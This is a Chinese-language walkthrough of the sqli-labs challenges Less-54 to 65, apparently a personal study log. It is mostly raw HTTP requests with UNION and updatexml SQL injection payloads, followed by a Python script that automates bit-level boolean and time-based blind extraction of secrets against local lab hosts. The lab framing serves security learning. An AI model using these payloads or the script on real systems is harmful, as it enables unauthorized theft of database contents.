Less-54:Challenge-1

  1. 获得表名,字段名
  2. 获得表内容
GET /Less-54/index.php?id=-1' union SELECT 1,GROUP_CONCAT(TABLE_NAME),GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=d8f93ca9310aad27c365bfe954c7db58; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628150103.jpg

GET /Less-54/index.php?id=-1' union SELECT 1,2,concat(id,'^',sessid,'^',secret_SPTS,'^',tryy) from challenges.X8J8LJ350P--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=d8f93ca9310aad27c365bfe954c7db58; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628150421.jpg

Less-55:Challenge-2

  1. 获得表名,字段名
  2. 获得表内容
GET /Less-55/index.php?id=-1) union SELECT 1,GROUP_CONCAT(TABLE_NAME),GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=6dc1db86de91d7b72dd07106bf78a073; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628150651.jpg

GET /Less-55/index.php?id=-1) union SELECT 1,2,concat(id,'^',sessid,'^',secret_WADC,'^',tryy) from challenges.IVP17DF90B--+ HTTP/1.1
Host: 192.168.50.10:83
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=6dc1db86de91d7b72dd07106bf78a073; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628151239.jpg

Less-56:Challenge-3

GET /Less-56/index.php?id=-1') union SELECT 1,GROUP_CONCAT('challenges.',TABLE_NAME),GROUP_CONCAT(COLUMN_NAME,',\'^\'') FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges';--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628153454.jpg

GET /Less-56/index.php?id=-1') union SELECT 1,2,concat(id,'^',sessid,'^',secret_0JFT,'^',tryy) from challenges.VIS34ABI7I--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628153558.jpg

Less-57:Challenge-4

GET /Less-57/index.php?id=-1" union SELECT 1,GROUP_CONCAT(TABLE_NAME),GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges';--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628154007.jpg

GET /Less-57/index.php?id=-1" union SELECT 1,2,concat(id,'^',sessid,'^',secret_0P5J,'^',tryy) from challenges.3QPP2IAS7Y--+ HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628154135.jpg

Less-58:Challenge-5

GET /Less-58/index.php?id=1' and updatexml(1,concat('^',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628160213.jpg

GET /Less-58/index.php?id=1' and updatexml(1,concat('^',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628160305.jpg

GET /Less-58/index.php?id=1' and updatexml(1,concat('^',(SELECT secret_V82L from challenges.UABFNOT2PY),'^'),1) and 1='1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628160621.jpg

Less-59:Challenge-6

GET /Less-59/index.php?id=1 and updatexml(1,concat('^',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1=1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628161830.jpg

GET /Less-59/index.php?id=1 and updatexml(1,concat('^',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1=1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628161905.jpg

GET /Less-59/index.php?id=1 and updatexml(1,concat('^',(SELECT concat(secret_1C1M) from challenges.VNMF274FG8),'^'),1) and 1=1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628162840.jpg

Less-60:Challenge-7

GET /Less-60/index.php?id=1" and updatexml(1,concat('^',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1="1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163028.jpg

GET /Less-60/index.php?id=1" and updatexml(1,concat('^',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1="1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163208.jpg

GET /Less-60/index.php?id=1" and updatexml(1,concat('^',(SELECT concat(secret_O36W) from challenges.ZUNIN4CQQD),'^'),1)  and 1="1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163243.jpg

Less-61:Challenge-8

GET /Less-61/index.php?id=1') and updatexml(1,concat('^',(SELECT GROUP_CONCAT(TABLE_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1=('1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163338.jpg

GET /Less-61/index.php?id=1') and updatexml(1,concat('^',(SELECT GROUP_CONCAT(COLUMN_NAME) FROM information_schema.COLUMNS where TABLE_SCHEMA='challenges'),'^'),1) and 1=('1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163428.jpg

GET /Less-61/index.php?id=1') and updatexml(1,concat('^',(SELECT concat(secret_7TPW) from challenges.AVHQSLF5YD),'^'),1)  and 1=('1 HTTP/1.1
Host: 192.168.50.10:83
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: challenge=72477e4cbc223fd605cdf76361cbe0a6; PHPSESSID=70f5c348287957dd7faea0cb4d2a5eb6
Connection: close

QQ截图20220628163508.jpg

Less-62-65

一共130次的尝试机会,这就是盲注,自己第一反应就是暴力穷举盲注,然后想到二分法盲注还是不够,最后查资料发现还有利用穷举比特位

  • 采用暴力枚举盲注(使用等于号枚举)需要 10(10+26)+4(10+26)+24*(10+26+26) = 1992次
  • 采用二分法盲注(使用大于,小于,等于判断枚举)需要 (10+4+24)log2(10)+(10+4+242)*log2(26)+=418次(理想情况下)
  • 一个字符8个比特,一次判断出3比特,一个字符判断3次,一共10+4+24=38个字符,大约38*3=114次
  • 我们每次可以获取3bit数据,我们再利用sleep判断获取1bit信息,这样我们就可以每次获取4bit数据,并且实现一个字符2次请求即可.一共24+10+4=38个字符,每个字符2次请求,共需要38*2=76次请求即可

思路

输入1-12会返回不同的结果

QQ截图20220628170454.jpg

QQ截图20220628170508.jpg

  • 我们可以暴力枚举比特位的方法。利用左移(>>)运算符预设要判断的位置
select case bin(ascii(substr(table_name, 1, 1))>>3) & (POW(2,0)+POW(2,1)+POW(2,2))
when 0 then 1
when 1 then 2
when 2 then 3
when 3 then 4
when 4 then 5
when 5 then 6
when 6 then 7
else 8 end, bin(ascii(substr(table_name, 1, 1))),bin(POW(2,0)+POW(2,1)+POW(2,2)), substr(table_name, 1, 1)
from information_schema.tables where table_schema='challenges'

QQ截图20220628170824.jpg

使用上述代码,爆破challenges的第一个表的第一个字符的0-2比特位(3个比特位),并返回某种对应的值.例如字符b的二进制为01100010,低三位为010,和111进行与运算,得到010(十进制为2),根据条件,返回数值3.上述是根据返回状态的盲注

  • 一个字符8个比特,一次判断出3比特,一个字符判断3次,一共10+4+24=38个字符,大约38*3=114次
  • 保证我们需要的数字为输入参数,我们需要先分析语句的类型为整形或字符型(有没有括号闭合),在利用位运算实现得到指定的数值。使用手动判断的方法判断出闭合类型为字符型(单引号、括号闭合)。

QQ截图20220628171125.jpg

但是在网页请求中使用,需要进行url编码

QQ截图20220628171238.jpg

需要我们将&|进行URL编码,才可以正常执行。实现我们输入的参数id为1,但是返回的结果为我们指定的id为3的信息。同上需要将+使用%2B编码,否则会被php转换为空格

  • 我们还可以再减少次数,刚才每个字符需要3次请求,我们可以再缩减到2次
  • 我们请求后除了有显示的不同状态,其实还有一个状态--请求时间或者延时
  • 我们每次可以获取3bit数据,我们再利用sleep判断获取1bit信息,这样我们就可以每次获取4bit数据,并且实现一个字符2次请求即可
  • 具体的是第一次请求,获取0-2位时,使用if判断第6位的数据;第二次请求,获取3-5位时,使用if连接判断第7位的数据
select case bin(ascii(substr(table_name, 1, 1))>>0) & (POW(2,0)+POW(2,1)+POW(2,2))
when 0 then 1
when 1 then 2
when 2 then 3
when 3 then 4
when 4 then 5
when 5 then 6
when 6 then 7
else 8 end | (if(bin(ascii(substr(table_name, 1, 1))>>6) & (POW(2,0)), sleep(2),1) & 0)
from information_schema.tables where table_schema='challenges';


select case bin(ascii(substr(table_name, 1, 1))>>3) & (POW(2,0)+POW(2,1)+POW(2,2))
when 0 then 1
when 1 then 2
when 2 then 3
when 3 then 4
when 4 then 5
when 5 then 6
when 6 then 7
else 8 end | (if(bin(ascii(substr(table_name, 1, 1))>>7) & (POW(2,0)), sleep(2),1) & 0)
from information_schema.tables where table_schema='challenges';

获取了0-2位的数据(需要减一,即实际为4),通过查询时间,判断出第6位的数据为1,同时获取4比特数据

  • 得到第一个字符的二进制位:x1xxx100

QQ截图20220628172138.jpg

  • 获取了3-5位的数据(需要减一,即实际为0),通过查询时间,判断出第7位的数据为0,同时获取4比特数据。

  • 得到第一个字符的二进制位:01000100,即位字符D,这样,一共24+10+4=38个字符,每个字符2次请求,共需要38*2=76次请求即可

QQ截图20220628172151.jpg

# coding:utf-8
# 基于字符串比特位匹配的盲注脚本
import time

import requests
import re
import os

#less62
sql_fp = "1')%260%7c"
#less63
#sql_fp = "1'%260%7c"
#less64
#sql_fp = "1))%260%7c"
#less65
#sql_fp = "1\")%260%7c"
# 由于服务器响应慢,正常返回为2s多,sleep(0.1)延时1s
sql_cmd = sql_fp + "(select case bin(ascii(substr(@0_name, @1, 1))>>@2) %26 (POW(2,0)%2BPOW(2,1)%2BPOW(2,2))" \
                   "when 0 then 1 " \
                   "when 1 then 2 " \
                   "when 2 then 3 " \
                   "when 3 then 4 " \
                   "when 4 then 5 " \
                   "when 5 then 6 " \
                   "when 6 then 7 " \
                   "when 7 then 8 else 9 end " \
                   "%7c (if((bin(ascii(substr(@0_name, @1, 1))>>@3) %26 POW(2,0)) = 1,sleep(1),1) %26 0)" \
                   "from information_schema.@0s where table_schema=database() @4 )  --+"
sql_search = sql_fp + "(select case bin(ascii(substr(@0, @1, 1))>>@2) %26 (POW(2,0)%2BPOW(2,1)%2BPOW(2,2))" \
                   "when 0 then 1 " \
                   "when 1 then 2 " \
                   "when 2 then 3 " \
                   "when 3 then 4 " \
                   "when 4 then 5 " \
                   "when 5 then 6 " \
                   "when 6 then 7 " \
                   "when 7 then 8 else 9 end " \
                   "%7c (if((bin(ascii(substr(@0, @1, 1))>>@3) %26 POW(2,0)) = 1,sleep(1),1) %26 0)" \
                   "from @4 )  --+"
url = 'http://127.0.0.1:8003/Less-62/?id='
state_list = []
rp = 'Your\s*Login\s*name\s*:\s*(.*?)<br>'
rc = 1


def main():

    if os.path.exists('./bsl.txt'):
        print('文件存在')
        with open('./bsl.txt', 'r') as f:
            res = f.read().split('\n')
            for i in res:
                if i != '':
                    state_list.append(i)
    else:
        print('文件不存在')

        # 0.爆破状态表
        print('收集状态表')
        state_list.append('0')
        for i in range(1, pow(2, 3)+2):
            u = url + str(i)
            respond = requests.get(u)
            state_list.append(re.findall(rp, respond.text)[0])
            print('.', end='')

        with open('./bsl.txt', 'w') as f:
            f.write('\n'.join(state_list))
            print('写入完成')

    print('爆破状态表:')
    print(state_list)

    # @ 表名
    table_name_list = []
    if input('是否指定表名? y/n:') != 'y':
        print('[~]进行表名判断')
        for i in range(1, 11):
            c = 0
            # 1.判断 字符的第0,1,2,6位
            # 010 大写字母; 011 小写字母; 001 数字
            state = req('table', i, 0, 6)
            c = c | state[0] | state[1] << 6
            # print(state, '第{:d}个字符的0-2,6位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

            # 2.判断 字符的第3,4,5,7位
            state = req('table', i, 3, 7)
            c = c | state[0] << 3 | state[1] << 7
            # print(state, '第{:d}个字符的3-5,7位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

            print('第{:d}个字符为:[ {} ]'.format(i, chr(c)))
            table_name_list.append((chr(c)))
        table_name = ''.join(table_name_list)
        print('爆破表名为: [ {} ]'.format(table_name))
    else:
        table_name = input('输入表名:').strip()

    # @字段名
    column_name_list = []
    offset = 7
    if input('是否指定字段名? y/n:') != 'y':
        print('[~]进行第三个字段名名判断,从第7个字符,判断4个字符出来')
        for i in range(1, 5):
            c = 0
            # 1.判断 字符的第0,1,2,6位
            # 010 大写字母; 011 小写字母; 001 数字
            state = req('column', i+offset, 0, 6, table_name=table_name)
            c = c | state[0] | state[1] << 6
            # print(state, '第{:d}个字符的0-2,6位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

            # 2.判断 字符的第3,4,5,7位
            state = req('column', i+offset, 3, 7, table_name=table_name)
            c = c | state[0] << 3 | state[1] << 7
            # print(state, '第{:d}个字符的3-5,7位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

            print('第{:d}个字符为:[ {} ]'.format(i, chr(c)))
            column_name_list.append((chr(c)))
        column_name = 'secret_' + ''.join(column_name_list)
        print('爆破的字段名为:[ {} ]'.format(column_name))
    else:
        column_name = input('输入字段名:').strip()

    # 9u8573nri2
    # secret_WJWE
    # @字段内容
    value_list = []
    print('[~]字段值进行枚举中....')
    for i in range(1, 25):
        c = 0
        # 1.判断 字符的第0,1,2,6位
        # 010 大写字母; 011 小写字母; 001 数字
        state = search(column_name, table_name, i, 0, 6)
        c = c | state[0] | state[1] << 6
        # print(state, '第{:d}个字符的0-2,6位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

        # 2.判断 字符的第3,4,5,7位
        state = search(column_name, table_name, i, 3, 7)
        c = c | state[0] << 3 | state[1] << 7
        # print(state, '第{:d}个字符的3-5,7位为:{},{}'.format(i, str(bin(state[0]))[2:5], state[1]))

        print('第{:d}个字符为:[ {} ]'.format(i, chr(c)))
        value_list.append((chr(c)))
    value = ''.join(value_list)

    print('爆破表名为: [ {} ]'.format(table_name))
    print('爆破的字段名为:[ {} ]'.format(column_name))
    print('[!]{}的值为:[ {} ]'.format(column_name, value))


def req(type, i, co, ci, **kwargs):
    global rc
    rl = []
    t = sql_cmd
    if type == 'column':
        ep = "and table_name = '{}' limit 2,1".format(kwargs['table_name'])
    else:
        ep = ''
    sql = t.replace('@0', type).replace('@1', str(i)).replace('@2', str(co)).replace('@3', str(ci)).replace('@4', ep)

    u = url + sql
    print('[!]第{:d}次请求......'.format(rc))
    rc = rc + 1
    time_start = time.time()
    respond = requests.get(u)
    time_end = time.time()
    timeReal = time_end - time_start
    # print(respond.text)
    rl.append(getIndex(state_list, re.findall(rp, respond.text)[0]) - 1)
    # print(timeReal)
    if timeReal > 4:
        rl.append(1)
    else:
        rl.append(0)
    return rl


def search(cn, tn, i, co, ci):
    global rc
    rl = []
    t = sql_search
    sql = t.replace('@0', cn).replace('@4', tn).replace('@1', str(i)).replace('@2', str(co)).replace('@3', str(ci))

    u = url + sql
    print('[!]第{:d}次请求......'.format(rc))
    rc = rc + 1
    time_start = time.time()
    respond = requests.get(u)
    time_end = time.time()
    timeReal = time_end - time_start
    # print(respond.text)
    rl.append(getIndex(state_list, re.findall(rp, respond.text)[0]) - 1)
    # print(timeReal)
    if timeReal > 4:
        rl.append(1)
    else:
        rl.append(0)
    return rl


def getIndex(bl, value):
    for i, e in enumerate(bl):
        if e == value:
            return i
    return -1


if __name__ == '__main__':
    main()